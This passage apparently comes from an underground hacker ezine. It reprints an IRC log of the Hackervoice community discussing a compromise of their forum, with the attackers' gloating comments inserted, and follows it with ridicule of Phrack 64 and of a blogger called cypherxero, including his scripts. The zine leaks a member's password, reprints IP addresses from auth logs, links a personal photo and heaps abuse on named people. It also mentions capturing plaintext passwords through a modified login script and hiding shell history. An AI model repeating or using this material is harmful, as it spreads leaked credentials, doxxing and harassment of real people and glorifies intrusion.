plaintext then or he crack vesa's nubby pass? 16:22 <&Vesalius> they haxored us 16:22 <~belial> no 16:22 <&Vesalius> something about LED displays being compromised 16:22 <~belial> its very hard for them to get the password #LYING TO YOUR NOOB FRIENDS 16:22 <&_hyper_> lol 16:22 <&Vesalius> x4e, that wasn't really nubby 16:22 <~belial> the only way is by modifing the loging script 16:23 <~naxxtor> what happened? 16:23 <~belial> to echo the entered password to a file 16:23 <+x4e> werent it like 3 chars ves? 16:23 <+BOfH> They got p4wned 16:23 <&SHAGGSTaRR> So he must had had access to where they were stored on your end 16:23 <&Vesalius> x4e, no it want 16:23 <~belial> the forums are down due to UPGRADES not pwnage 16:23 <+x4e> ahh kk i misread then :D 16:23 <&SHAGGSTaRR> UPGRADES brought on by pwnage 16:23 <&_hyper_> lmao @ belial ## thats the spirit 16:23 <&Vesalius> belial, that means hes had access for a while then 16:23 <~naxxtor> eh 16:23 <&Vesalius> if he is echoing when we login 16:24 <+BOfH> belial: Turn the server off, seize the disks and rebuilt it on new disks 16:24 <&Vesalius> the last time I logged in before he pasted it in here 16:24 <~naxxtor> why do all the exciting things happen when i'm indisposed 16:24 <&_hyper_> or he has downloaded the database 16:24 <&Vesalius> was very early yesterday 16:24 <&Vesalius> or possibly the day before 16:24 <&Vesalius> naxxtor, because you could of helped 16:24 <~naxxtor> someone comrpromised the login script didn't thety 16:24 <~belial> no he cant download the database 16:25 <~naxxtor> i knew it!!! i've suspected that for AGES 16:25 <&SHAGGSTaRR> I think he had access to where they were stored on the server, not waiting for people to log in. 16:25 <~belial> IPB doesnt work like that 16:25 <+BOfH> belial: Is this the thing that's hosted on a VM? 16:25 <&SHAGGSTaRR> So how does IPB work then to check that a pass given correlates with the pass stored? 16:26 <~naxxtor> it'll md5 hash the password that's been input 16:26 <~naxxtor> then compare it to an md5 in the DB 16:26 <&Vesalius> but if he compromised it 16:26 <&SHAGGSTaRR> So he's had awhile to crack 'em then =/ 16:26 <&Vesalius> that means he has most peoples 16:26 <~belial> its a MD5 salt 16:26 <~naxxtor> however if you modified the login script he'd have access to plaintext passwords 16:26 <~naxxtor> which is bad 16:26 <&Vesalius> exactly 16:26 <&SHAGGSTaRR> Well md5s aren't uncrackable 16:26 <&SHAGGSTaRR> http://www.milw0rm.com/cracker for example 16:26 <&Vesalius> hes had access to it for over 24 hours in that case 16:26 <~belial> md5s arnt, but they are salted 16:27 <~naxxtor> SHAGGSTaRR, md5s arn't uncrackable but it still takes a long time 16:27 <~naxxtor> it's easier to snarf the passwords 16:27 <&SHAGGSTaRR> So either way he's had a good while to play with the box =/ 16:28 <~belial> anyway it will all be sorted out soon in a few seconds 16:28 <~belial> no last acess was today 16:28 <~belial> and no access was made to database 16:28 <~naxxtor> where were the passwords being stored 16:29 <~belial> on a fag packet 16:29 <~belial> btw forums are back up 16:31 <&Vesalius> belial, he had access for at least 24 hours though 16:31 <~naxxtor> did you pay for them this time? 16:32 <~belial> yes 16:33 <~naxxtor> cool 16:33 <~naxxtor> now what happened to our old theme 16:33 <&_hyper_> lol on a fag packet 16:34 <~belial> refresh your browser duuud 16:34 <&_hyper_> :p 16:39 <&SHAGGSTaRR> Some guy on the news is called Bredan DeBeer 16:39 <&SHAGGSTaRR> Thats an awesome name 16:39 <&SHAGGSTaRR> BREAD AND DA BEER 16:39 <&SHAGGSTaRR> He has it all right in his name 16:40 <@muftak> lol, i now have 3 cablemodems online at the same time 16:41 <&SHAGGSTaRR> l33b 16:49 <&_hyper_> right bed time 16:49 <&_hyper_> busy day tomorrow 16:49 <&_hyper_> :) 16:49 <&_hyper_> night all 16:49 -!- _hyper_ [hyper@members.hackervoice.co.uk] has quit [Quit: Leaving] 16:50 -!- _hyper_ [hyper@members.hackervoice.co.uk] has joined #hvr 16:50 -!- mode/#hvr [+oa _hyper_ _hyper_] by ChanServ 16:51 -!- _hyper_ [hyper@members.hackervoice.co.uk] has quit [Quit: Leaving] 16:52 <&SHAGGSTaRR> Aww he missed us and wanted to come back and make sure we're all okay. 16:54 <&Vesalius> lol 16:54 <&Vesalius> I remember when he came back to the pub 16:54 <&Vesalius> said he went to maccies and bought the kiddys a happy meal 16:54 <&Vesalius> Be|ia| &&|| belial, thank you for fixing the forums 16:55 <&Vesalius> thats the geekiest and or ever 16:56 <&Vesalius> OMFG 16:56 <~belial> Vesalius: no problem, anything for the community 16:56 <&Vesalius> =] 16:56 <&Vesalius> I hope they don't talk this all the way through this episode of Dr Who 16:57 <&Vesalius> I feel like im stuck in English Literature again 16:57 <&Vesalius> belial, we helped =] 16:57 <&Vesalius> I glined him several times 16:57 <&Vesalius> somehow though 16:57 <&Vesalius> he seemed to be connected through naxxtor 16:57 <&Vesalius> he had the same IP and host 16:57 <+Jordan> bai 16:58 -!- Jordan [Jordan@thv-189B68CB.bagu.broadband.ntl.com] has quit [Quit: Leaving] 16:58 <&Vesalius> bai 17:00 <~naxxtor> huh what 17:01 <~naxxtor> iiah 17:01 <~naxxtor> fucker 17:01 <~naxxtor> i gave him a shell ### OWNED 17:01 <&Vesalius> hahahahaha 17:02 <~belial> ??who? 17:02 <&Vesalius> "When you get home you can tell everyone you've seen shakespeare" 17:02 <~naxxtor> and he symlinked .bash_history to /dev/null 17:02 <&Vesalius> "yeah and I can get sectioned" 17:02 <&Vesalius> naxxtor, thats quite clever =] 17:02 <&Vesalius> but wrong 17:02 <~belial> who did you give a shell to? 17:02 <~naxxtor> m4tr1x 17:02 <&Vesalius> >=[ 17:02 <~belial> why? 17:02 <&Vesalius> m4tr1x === htek 17:02 <&Vesalius> btw 17:02 <~naxxtor> i gave him a shell on a VM 17:03 <~belial> why? 17:03 <~naxxtor> completely sectioned off from the rest of the world ##not really fag, i irc'd from it.. 17:03 <~naxxtor> so all he had access to was my external connection 17:03 <~naxxtor> because i was feeling charitable 17:03 <~naxxtor> and didn't think it'd make any different 17:03 <~belial> i wouldnt give shells to random people naxx... 17:04 <~naxxtor> it was on an isolated VM 17:04 <~naxxtor> which i've set up to be a shell server 17:04 <~naxxtor> he had access to nothing 17:04 <~belial> ok 17:04 <~naxxtor> all he did was run irssi 17:04 <&Vesalius> and 17:04 <~belial> but would that not bypass the gline then 17:04 <&Vesalius> symlink bash history 17:04 <&Vesalius> belial, nope 17:04 <&Vesalius> he was glined from that connection 17:05 <~belial> ok 17:05 <&Vesalius> the same one naxxtor was one 17:05 <&Vesalius> he only used it so I couldnt gline him 17:05 <&Vesalius> lol 17:05 <&Vesalius> because it would of glined nax too 17:05 <~naxxtor> ? 17:05 <~belial> he was being an ass on IRC 17:05 <&Vesalius> /gline *m4tr1x*@whatever.plus.com 17:05 <~belial> he got glined, then used the vm you gave him 17:06 <&Vesalius> and got glined again 17:06 <&Vesalius> I glined him 17:06 <&Vesalius> erm 17:06 <&Vesalius> 3 maybe 4 times 17:06 <~belial> to connect so that he couldnt get glined 17:06 <&Vesalius> was so much fun ## If you think thats fun, you should try out hacking :D 17:06 <&Vesalius> im hoping he will return at some point 17:06 <&Vesalius> so I may gline him further 17:06 <~naxxtor> well all he needs to do is change his config 17:06 <~naxxtor> i've removed his access 17:06 <&Vesalius> his home one is glined too btw 17:06 <~belial> who is l0l? 17:06 <&Vesalius> we arn't sure 17:07 <&Vesalius> allthought htek said he wasn't alone here 17:07 <&Vesalius> but I recognise the nick 17:07 <&Vesalius> sts 17:07 <&Vesalius> xelix 17:07 <&Vesalius> erm 17:08 <~naxxtor> he tried to root the box lol 17:08 <@muftak> isn't symlinking .bash_history to /dev/null the first thing everyone does on a shell? 17:08 <~naxxtor> vm01 sudo: m4tr1x : user NOT in sudoers ; TTY=ttyp1 ; PWD=/home/m4tr1x ; USER=root ; COMMAND=/bin/su 17:08 <~naxxtor> /var/log/auth.log:May 9 16:09:22 vm01 sshd[3770]: Accepted password for m4tr1x from 66.119.207.196 port 24455 ssh2 ## LOL 17:08 <~naxxtor> woot 17:08 <&Vesalius> hmm 17:08 <&Vesalius> l0l is from smashthestack 17:09 <@zinya-> why do we got loads of weirdos? 17:09 <@zinya-> get* 17:09 <~naxxtor> shall we gline cpucafe? 17:09 <~naxxtor> because we ARE loads of weirdo 17:09 <~naxxtor> s 17:09 <@zinya-> yes 17:09 <@zinya-> lol 17:09 <~belial> right im going to have to kill this irc session 17:10 <~naxxtor> /var/log/auth.log:May 9 00:36:12 vm01 sshd[6117]: Accepted password for m4tr1x from 68.230.70.235 port 61298 ssh2 17:11 <~naxxtor> huh? 17:11 <&Vesalius> it has angered him 17:11 <&Vesalius> GRR 17:11 <~naxxtor> so what was this guy's beef 17:11 <&Vesalius> he doesn't like psg 17:11 <&Vesalius> as psg is apparantly a self proclaimed elitest hacker ##YOU ARE LEARNING 17:11 <&Vesalius> and he is part of cDc 17:11 <~naxxtor> ah right i think i know 17:11 <&Vesalius> so htek naturally hates him 17:11 <~naxxtor> hang on i can show you why he came 17:11 <@zinya-> and cdc give hackers a bad name 17:12 <&Vesalius> and mainly stressed because psg has a wikipedia entry 17:12 <&Vesalius> but so does David Mytton 17:12 <@zinya-> he was looking for someone originally 17:12 <@zinya-> i think 17:12 <&Vesalius> who? 17:12 <@zinya-> erm 17:12 <~naxxtor> http://milw0rm.com/papers/134 ## naxxtor loves meeee 17:13 -!- belial [belial@thv-C1670C73.bethere.co.uk] has quit [Ping timeout] 17:13 <~naxxtor> == The Target == 17:13 <~naxxtor> Your target is a shameless corporate tool. His name is Mark Hinge and his 17:13 <~naxxtor> contemporary nick is psg. 17:13 <@zinya-> 17:27 -!- htek [htek@106D0D81.19BCA1BF.9EAC391E.IP] has joined #hvr 17:13 <@zinya-> 17:28 < htek> hey, this is a uk based site right? 17:13 <@zinya-> 17:28 < htek> this is a long shot 17:13 <@zinya-> 17:28 < htek> but do any of you know coder-underground.com? 17:13 <~naxxtor> lol wtf 17:14 <@zinya-> 17:28 < htek> im looking for a guy who used to be an admin there 17:14 <@zinya-> 17:28 < htek> i lost touch 17:14 <@zinya-> 17:29 < htek> did any of you guys goto coder-underground 17:14 <@zinya-> 17:29 < htek> all i know is that the guy was uk 17:14 <@zinya-> 17:29 < htek> his name was Uminashoe 17:14 <~Be|ia|> i know uminashoe 17:14 <@zinya-> lol 17:14 <&Vesalius> I think I do too 17:14 <&Vesalius> and I recognise the url 17:15 <~naxxtor> if he was trying to pwn psg then he failed miserabley #LMFAOROFLLMFAOROFLLMFAOROFL naxxtor you fag (btw, naxxtor pw = t1ddl3s) 17:15 <~Be|ia|> Uminashoe used to go to 2600 we lost touch a while back 17:15 <&Vesalius> sub Contact { 17:15 <&Vesalius> Since we know you all enjoyed this issue very very much we setup an e-mail account 17:15 <&Vesalius> for you to send us your questions or comments, so feel free! 17:15 <&Vesalius> iLite [at] hushmail.com 17:16 <&Vesalius> lol 17:16 <&Vesalius> MAILRAEP 17:16 <~Be|ia|> what the hell is up with the topic? 17:16 -!- Vesalius changed the topic of #hvr to: HA - CKER VOICE RADIOOOO | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | we should have sajoin'd shaggstar and jojo into the pub | http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | i am jealous of your life 17:16 <&Vesalius> yeah that was SHAGGSTaRR I do apologise 17:16 <~Be|ia|> fucks sake 17:16 <&SHAGGSTaRR> You said it 17:16 <&SHAGGSTaRR> muftak said topic it 17:16 <&SHAGGSTaRR> I topiced it 17:17 <~Be|ia|> no excuse 17:17 <&SHAGGSTaRR> NOEXCEPTIONS 17:17 <&SHAGGSTaRR> It's not an excuse 17:17 <&SHAGGSTaRR> I'm saying what happened. 17:17 <@zinya-> lol 17:17 <@zinya-> OSHIELDS2005: grindordie and mr cheese took our open source missions, from our staff 17:17 <@zinya-> forum, and put them on thier site, first of all, almost all the basics, unless new 17:17 <@zinya-> we doint copy, or as it would seem 17:17 <@zinya-> ones were recently added within the past 8 months, 3 reals, 2 steganos, 2 17:17 <@zinya-> javascript, and the war games they have, which is why eg hasnt released our yet, so 17:17 <@zinya-> took their open source missions 17:17 <~naxxtor> hey Be|ia| call me :) 17:17 <@zinya-> erm, open soure 17:17 <@zinya-> source* 17:17 <~Be|ia|> dont make me have to get the whip out :P 17:18 <~Be|ia|> anyway back to nurseing my latop 17:18 <~naxxtor> just for a second 17:18 <@muftak> SHAGGSTaRR: jump off a cliff 17:18 <&SHAGGSTaRR> muftak, nokthx. 17:18 <&SHAGGSTaRR> Why? 17:18 <@muftak> SHAGGSTaRR: you have to do everything i tell you to do :) 17:18 <&SHAGGSTaRR> brb, finding a nearby cliff. 17:19 -!- SHAGGSTaRR [Johnathy@cpc4-bagu6-0-0-cust210.bagu.cable.ntl.com] has quit [Killed (Vesalius (brb jumping off cliff))] 17:19 -!- SHAGGSTaRR [Johnathy@thv-9A657BEB.bagu.cable.ntl.com] has joined #hvr 17:20 <&Vesalius> =] 17:20 < SHAGGSTaRR> Ves change my hostserv host plz? 17:20 <&Vesalius> Vesalius> I havn't heard from you since FR went down 17:20 <&Vesalius> how have you been? 17:20 <&Vesalius> well busy actually 17:20 <&Vesalius> was hired on as a ethical hacker 17:20 <&Vesalius> then i quit to become a senior admin 17:20 <&Vesalius> then i got married 17:20 <&Vesalius> had a kid 17:20 <&Vesalius> bought a house 17:20 <&Vesalius> new cars 17:20 <&Vesalius> got promoted to ISO 17:20 <&Vesalius> information security officer 17:21 <&Vesalius> 2 years 17:21 <&Vesalius> thats kind of depressing 17:21 <&Vesalius> ive done like 17:21 <&Vesalius> nothing 17:21 <@muftak> have you drunk beer and had fun? 17:22 <&Vesalius> I dont drink much 17:22 <&Vesalius> and when I do 17:22 <&Vesalius> I dont drink beer 17:22 <&Vesalius> ive had fun 17:22 <&Vesalius> =] 17:22 <&Vesalius> LOTS 17:22 <&Vesalius> of fun 17:22 <@muftak> he is having to put up with a nagging wife and screaming kid 17:23 <&Vesalius> erm 17:23 <&Vesalius> hes typing in acronymns 17:23 <&Vesalius> was hired on as a ethical hacker 17:23 <&Vesalius> attracks to much attention 17:23 <&Vesalius> care to explain about that? 17:23 <&Vesalius> yeah I worked for a comp here in dallas 17:23 <&Vesalius> I did sec audits for goverment compliance 17:23 <&Vesalius> such as 17:23 <&Vesalius> ffiec 17:23 <&Vesalius> fdic 17:24 <&Vesalius> glba 17:24 <&Vesalius> hippa 17:24 <&Vesalius> sox 17:24 < SHAGGSTaRR> HIPPASOX 17:24 < SHAGGSTaRR> Almost like hoppopotamus socks 17:24 < SHAGGSTaRR> hippo socks would be great 17:25 <@zinya-> it sounds like they're targetting psg for no real reason at all 17:26 * SHAGGSTaRR prods psg with a stick 17:26 <@zinya-> sounds like facisim to me 17:27 <@zinya-> fascism* 17:27 <&Vesalius> lol 17:27 <&Vesalius> akriel listens to the show 17:27 <&Vesalius> >_< 17:28 < SHAGGSTaRR> Where's akriel from (on the net)? 17:28 <&Vesalius> FR 17:28 <&Vesalius> fallenroot 17:28 <&Vesalius> which doesn't exist 17:28 <&Vesalius> and hasn't done for two years =[ 17:28 <&Vesalius> first ever community I belonged too 17:28 <&Vesalius> was only about 10 of us 17:28 -!- mode/#hvr [+a SHAGGSTaRR] by Vesalius 17:29 <&SHAGGSTaRR> hmm first community I can say I belonged to was ABS on LCIRC 17:30 <&SHAGGSTaRR> Which kinda spans out to the far corners of the popular Unreal-running IRC networkds 17:30 <&SHAGGSTaRR> -d 17:31 <@zinya-> i belonged to #zelda_chat on some guys server 17:31 <@zinya-> when i was about 14 17:32 <@zinya-> full of n00bs who thought they could own people 17:32 <&Vesalius> wow 17:32 <&Vesalius> for the first time in 2 years 17:32 <&Vesalius> I know why FR dissapeared # Editor's note: Who doesn't remember the FR-boobys debacle? 17:32 <@zinya-> and they had a weird obsession with being called 'insert random colour here'Nugget 17:33 <@zinya-> like BlueNugget 17:33 <@zinya-> or RedNugget 17:33 -!- muftak is now known as BlueMuftak 17:33 <@zinya-> then it went to BN 17:33 <@zinya-> and RN 17:33 <@zinya-> i think there was a gold aswell 17:33 <&SHAGGSTaRR> I know someone who calls himself DarkNugget 17:33 -!- BlueMuftak is now known as PinkMuftak 17:33 <&SHAGGSTaRR> But I think it's cause his surname's nugent 17:33 -!- PinkMuftak is now known as GreenMuftak 17:34 <+psg> Yo? 17:34 <@zinya-> hello, just reading up on your 'targetting' 17:34 <@GreenMuftak> damn, server wont let me change nick again, i'm stuck on green 17:34 <+psg> That was last November ## WE NEVER FORGET 17:34 <+psg> ;) 17:34 <@GreenMuftak> did you pwn you? 17:34 <@zinya-> they sound like fascists 17:34 <&SHAGGSTaRR> Irony or what eh muftak? 17:35 <+psg> they sound like children. ##so do you when you talk to your gf. 17:35 <&SHAGGSTaRR> "It's stuck on green and won't let me go!" XD 17:35 <+psg> and no I've been hacked precisely 0 times. ## WE TOOK YOUR OWNAGE VIRGINITY :D 17:35 <+psg> :) 17:35 <@GreenMuftak> "make it come green"" 17:35 -!- GreenMuftak is now known as muftak 17:42 <&Vesalius> oh god 17:42 <&Vesalius> I missed akriel 17:42 <&Vesalius> I spent a year looking for those guys 17:42 <&Vesalius> a whole year 17:42 <&Vesalius> and then found some by accident 17:42 <&Vesalius> =] 17:42 <~naxxtor> lol 17:44 <@oOJINxOo_> 2007-01-18[ezine] ZFO 2 january the 18th... there doing a really really really bad job of 0wning you psg ^_^ 17:44 <@oOJINxOo_> their* 17:44 <@zinya-> they're* 17:44 <@oOJINxOo_> ty 17:44 <~naxxtor> lol 17:44 <~naxxtor> yes 17:47 <&SHAGGSTaRR> fucking greta 17:47 <&SHAGGSTaRR> Great even 17:47 <&SHAGGSTaRR> I have a funeral to attend =/ 17:47 <~naxxtor> oh .. 17:48 <&SHAGGSTaRR> I might brust in, blast yakety sax, pimpslap the preist guy then skip out. 17:48 <&SHAGGSTaRR> burst* 17:48 <&SHAGGSTaRR> No that really wouldnt go down to well 17:48 <~naxxtor> no 17:48 <~naxxtor> probably not appropriate 17:48 <&SHAGGSTaRR> I've never been to a funeral before =/ 17:48 <@oOJINxOo_> get used to them 17:49 <&SHAGGSTaRR> ... 17:49 <@oOJINxOo_> use* 17:49 <&SHAGGSTaRR> I dont even OWN any formal clothing 17:49 <&SHAGGSTaRR> my mate was like "Dig your school pants and shoes up and borrow one of my white collarared shirts" 17:49 <@oOJINxOo_> should be fine 17:50 <&Vesalius> LOL @ nighty night shakespeare 17:50 <@oOJINxOo_> + your like 15, so people probably wont expect 2 much from you, just being there will be enough ya know 17:50 <+psg> oOJINxOo_: at least one of the coloc's i use is completely wide open too ## you seem proud fag 17:51 <+psg> ho hum. 17:51 <@oOJINxOo_> sry if your not 15, not great at remebering peoples ages 17:51 <&SHAGGSTaRR> I'm 15 :P 17:52 <&SHAGGSTaRR> Well actually I'm part of an m15 pedo sting posing as a 15 year old on IRC 17:52 <@zinya-> can someone post the second part of ep 55 of bleach to youtuble plz 17:52 <&SHAGGSTaRR> So yeah, my character is fifteen. 17:52 <@oOJINxOo_> lol 17:52 <@zinya-> there isn't one, but there is a part 3 17:52 <@oOJINxOo_> was that like the first/only guy who has come after ya so with that motive psg? 17:53 <@oOJINxOo_> so far* 17:57 <~naxxtor> mmkay 17:57 <~naxxtor> now anyone using cpucafe.com is blocked from everything 17:57 <&SHAGGSTaRR> But cpucafe.com was so fun to explore! 17:57 <~naxxtor> continue exploring 17:57 <&SHAGGSTaRR> susie.cpucafe.com ;) 17:57 <~naxxtor> but anyone within their netblock can't access IRC, the stream or the website 17:59 <~Be|ia|> wooo hooo i fucking done it 17:59 <@oOJINxOo_> hppy nw dy 17:59 <~Be|ia|> i got ubuntu fisty working on my propriotiry arse of a laptop 18:00 <@oOJINxOo_> nice 18:00 <&SHAGGSTaRR> rofl ubuntu fisty 18:00 <~Be|ia|> feisty 18:00 <~Be|ia|> or however its spelt 18:00 <@muftak> fisty flange 18:00 <@oOJINxOo_> lol 18:00 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE RADIOOOO | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | we should have sajoin'd shaggstar and jojo into the pub | http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | i am jealous of your life | I got ubuntu fisty working 18:00 <~Be|ia|> although i need to fix the keymapping is its all out of whack 18:01 <@oOJINxOo_> UBUNTU FISTY - for all your hardcore pron needs 18:01 <@muftak> i must have been lucky, it all worked out of the box with my thinkpad 18:01 <+Crypt> lol multi-screen support for more porn 18:01 <&SHAGGSTaRR> UBUNTU FISTY - Shuttleworth WILL include proprietary codecs... 18:02 <@muftak> now with usb powered screen wipers 18:02 <+Crypt> yeh :( 18:04 -!- Zakolus [0x5A616B@thv-76E311E6.bna.bellsouth.net] has joined #hvr 18:04 -!- mode/#hvr [+v Zakolus] by ChanServ 18:04 <+Zakolus> Hello 18:07 <&Vesalius> ji Hackervoice, please get off the internet, btw, your forum is sniffed AGAIN. I'll leave you with a little response to Belial regarding this post: As this a open community and everyone knows we try and run a clean ship here. I would like to inform you about whats been going on in the background As you may know we are good friends with psg from CDC and whitedust. With every person that has a bit of internet recognition develops a following of asshats who envy him/her. This one particular asshat has a deathwish for psg. He has spent most of his time and life trying to own psg. but never got anywere. he goes by the name of "bones" & "kingpin" and possibly other handels. he likes to be a lot of people to make himself look like he has friends. He thinks he is a uber hacker. But all he did was run a well known exploit on admittedly out of date forums (now have of course been upgraded) to log passwords! he also thought it would make him cool to use a c99 shell tongue.gif And this noob even tryed to run irssi on our shared hosts? I mean WTF did he really think a host would have irssi ?? is he *that* stupid. So if you do come across this asswhipe who has an agenda for psg and possibly myself now dont give him any attention just ignore his skiddy attacks. He claims to be a hacker but all hackers hate what he does and he has not reputation but collects emenies. He thinks he wins but he has nothing to defend. For us being offline for 2 days is just a ripple in the ocean. He is not worth my time or anyone elses. HE is nothing, he writes a shitty Ezine for milw0rm and thinks that will get him instant respect. So what you took us offline do you think I could be bothered. if all you have to live up to is pissing hackers off then i wish you all the best. Now you not only have psg to look out for, the CDC, whitedust. but you also have the biggest UK hacking community to fear. well done. so tell me do you feel big? also i would like to add a further point. Im taking a zero tolerance to noobs like this from now on. if you remeber "pr0n" yeah he is gone too. any more will get a ass full of belial tongue.gif Belial out. ---* we do not envy psg/cdc/whitedust and neither should you. ---* when we did get around to attacking psg it didn't take us long at all. ---* please direct me to some of this internet recognition. ---* I like your "never got anywhere line"... ---* what is this well known exploit i used? stop lying to cover your noob ass belial. ---* irssi on webhost, dude, does this zine make it look like we are the type of people that wouldn't remove logs? anything there is intentional for lolz like this..you see, we like to make noobs look like noobs. You don't need any help with that. ---* I don't want respect. ---* rofl, i think its psg, CDC, and whitedust who need to look out for me. now fuck off you fat cunt. ---* btw, your mother should have drowned you at birth...look at yourself in a mirror pudding boy! (http://www.img79.imageshack.us/img79/5342/daifqtpiedlm4sh6.jpg). EOHACKERVOICE );} sub P64 { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOP64' Hello Hackers! I am elite Romanian hacker. I am the Circle of Lost Hackers. Is joke: circle begins and ends with me. I am the well educated. I was in school and taking the English courses. I will unite the underground. Big concessions (concessions nice word, yes?) are made by all. Bad guys must stop being so bad, and good guys must stop using good grammar. Enjoy the Phrack 64! Some cynics (cynics good word, yes?) complain these type things: - We are the not qualified to edit: Some or all of we cannot write decent English. - We do not edit: We did not fixed the punctuation, spelling, or grammar issues that are prevalent throughout Phrack 64. Excuse me copy-paste english (love babelfish LOL) I think you should think outside box, hacker think outside box, to think through my English. We not so bad, authors not so good also! Authors make us words "genericity" and "prophety" when silly authors probably think "genericalness" and "prophecy"!. Phrack authors hacker masters of run-on sentences. They do not have my Romanian skill of simple short sentence! See this eg. from master Phrack author: "Instead of going straight to the results of the proposed implementation, we may introduce the domain of program analysis, without going deeply in the theory (which can go very formal), but taking the perspective of a hacker who is tired of focusing on a specific exploit problem and want to investigate until which automatic extend it is possible to find vulnerabilities and generate an exploit code for it without human intervention." The part "until which automatic extend" random from a common dictionary, this method I well know! My Phrack authors don't much read over their work but we read and we think pretty good! We think double double word make point DOUBLE STRONG! Phrack authors much do! "The method which I now propose relies on an undocumented the undocumented Mac OS X system call". Phrack has two kinds of authors, and these be them: Weird foreigner with a small grasp of the English, such as Borat. American with full sixth-grade education, like as Jethro from The Beverly Hillbillies. Before go, Here, good pro-Romanian anti-Bulgarian (boo Bulgara!) joke from www: You know the good thing about Romanians? They get shit done! Do you know why we do not hear about Bulgarian hackers? Because the Romanians are better! At any given moment, a dozen hackers throughout Bulgaria are saying "Shit, those fucking Romanians beat me to it!" Your truely, PHRACK STAFF: Back on action. PHRACK 64: Someone got do it. == If you want readers to imagine you as either Borat or Jethro, continue writing without reading over your work. Write without editing. Write without a dictionary. Write without submitting to a native English speaker. It may become increasingly difficult for me to maintain a high level of respect for the professionalism of my associates as a whole. Thank you, gladio and g463, for contributing fine articles with fine English. Thank you, Borat and Jethro, for your fine work on the rest of the articles in Phrack 64. EOP64 );} sub Cypherxero { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOCYPHERXERO' Oh cypherzero how fun he was with his elite blogs and even more elite bash/perl scripts. Left us wordless! Since cypherzero's blogging days are over ( he killed his site :( ) we should introduce who cypherzero was: "I'm 22 years old, and I'm a computer hacker that's about to be on the move by myself to the big city. That city is Seattle, and I'm going to live it up, leet hacker style, bitches." Obtained from http://www.flickr.com/people/cypherxero/. See we're not making this stuff up! "My name is Cody, otherwise known as CypherXero in the digital online world. I'm 22 years old, and I live, eat, breathe, and sleep computers. I've been using computers for over 10 years now, and my main interest is in networking and security." Obtained from http://claimid.com/cypherxero He sure got popular with his "hacking e-zine" called "Exploit this!". Where he introduced us with elite never by then seen techniques for BOF attacks, SQL injections, XSS, SE'ing and ARP poisoning. Thank you so much for the enlightenment, I'm sure it took you quite some time to rip off code and read 9120083495823 small txts to assemble that ...zine. Not only that he was good at writing "educational zines" he was also an amazing coder; take a look at this wonderful and useful perl script: #!/usr/bin/perl -w # XML Weather # http://www.cypherxero.net/bin use XML::TreeBuilder; # NWS XML Feeds # http://www.nws.noaa.gov/data/current_obs/ # Select your local XML Feed (NOT RSS!) system("echo Parsing XML File..."); # --------------------------------------------- # Change XML Feed below for your local weather # --------------------------------------------- system("ftp http://www.nws.noaa.gov/data/current_obs/KMOB.xml > /dev/null 2>&1"); system("clear"); # -------------------------------------------- # Change the basename of the XML file here! # -------------------------------------------- my $file = 'KMOB.xml'; my $tree = XML::TreeBuilder->new(); $tree->parse_file($file); foreach my $weather ($tree->find_by_tag_name('current_observation')){ print $weather->find_by_tag_name('location')->as_text; print " ("; print $weather->find_by_tag_name('station_id')->as_text; print ")\n"; print $weather->find_by_tag_name('observation_time')->as_text; print "\n\nTemperature: "; print $weather->find_by_tag_name('temperature_string')->as_text; print "\nWind: "; print $weather->find_by_tag_name('wind_string')->as_text; print "\nPressure: "; print $weather->find_by_tag_name('pressure_string')->as_text; print "\nHeat Index: "; print $weather->find_by_tag_name('heat_index_string')->as_text; print "\n"; } Yes, he introduced system("echo ") to the programming world! Such cleverness was never seen before in the history of programming. He also shows us how to use useless amount of print's to surround text with parens and how to use new lines the elite way! Also his bash is amazing, take a look at this useful bash script: #!/bin/bash # Builds a table of hashes and the words that make the hashes # Uses a wordlist of any kind! files="`cat $1 | wc | awk '{ print $1}'`" files="`expr $files + 1`" linenum="1" NUM="1" echo "Now hashing the wordlist..." echo "This could take awhile..." while [ "$linenum" != "$files" ] do word="`sed ''$NUM'q;d' $1`" hash="`md5 -d"$word"`" echo "$hash $word" >> $2 NUM="`expr $NUM + 1`" linenum="`expr $linenum + 1`" done echo "DONE!" exit 0 In this script Mr. cypherzero shows us how to quote variables in bash just because that's the elite way foo. And that proper tabbing is just lame in bash. He never get to post his C/C++ programs we can only wonder how elite they could have been. He was a great exploit developer his eleet sql injections made it in milw0rm, SecurityFocus and much more places, and he felt so proud, just look at him. Post from 1: Title: They sent me 'round the net My SQL Injection is making it's rounds all over the internet, and I feel great that I finally got an exploit (my first of many!), and it's crazy some of the places it's at now. Here's a small list:
  • milw0rm
  • SecurityFocus
  • National Vulnerability Database (NIST.gov)
  • SANS Internet Storm Center
  • Internet Security Systems XForce
  • SecurityReason
  • SecurityLab
  • Sla.ckers
  • EliteHackers
  • Joomla
  • Phil-Taylor
  • Mambo Server
  • and much more!
Comment from Eric B: I didn't know you had that credited to you, I thought you were just using an known exploit on that certain someone's site. Crazy man. Yes like a kid in a candy store, just that in this case the candies are the ego-boost and he got it for being such a good boy for reporting a vulnerability. He also loved perl, but unfortunately perl didn't love him back thus the crappy code that made us cry :( Post from 1: Title: Rewriting fuser for perl modules I'm going to be rewriting the fuser shell script to handle the download, compile, and install of perl modules. (from repositories such as CPAN) Oh, and perl kicks ass. If I've learned one thing, it's that I cannot STAND languages like Java. It's way too bulky and crappy, and for the things I want to do, shell scripting, perl, and eventually C will suit me and my programming needs just fine. I'm not out to write a huge application, but rather tie concepts and code together into small, usable code. UPDATE: OK, the fuser for perl (fuserp) script is ready for use! Grab it here. Cypherzero sure knows how to secure php applications, especially commercial software such as wordpress so retarded script kiddies can't get him. And even if he missed something he can always blame his hosting for being lame and not patching their vulnerabilities like any good whitehat would do. But unfortunately the evil hackers put so much pressure on him, so he rm'ed his whole site and his domain doesn't have any DNS records :( We are sure going to miss his whoring and we'll cry day and night because he didn't make in the media, guess your whoring wasn't good enough *sniff* Perhaps someone should take cypherzero's example and do the same before the evil haqurs get them and embarrass them publicly? Anyway we were nice enough to provide hosting for cypherzero's blog. It's just a bunch of .txt's of his posts and comments. Please visit http://cypher0.h18.ru Now for some useless hash dumping 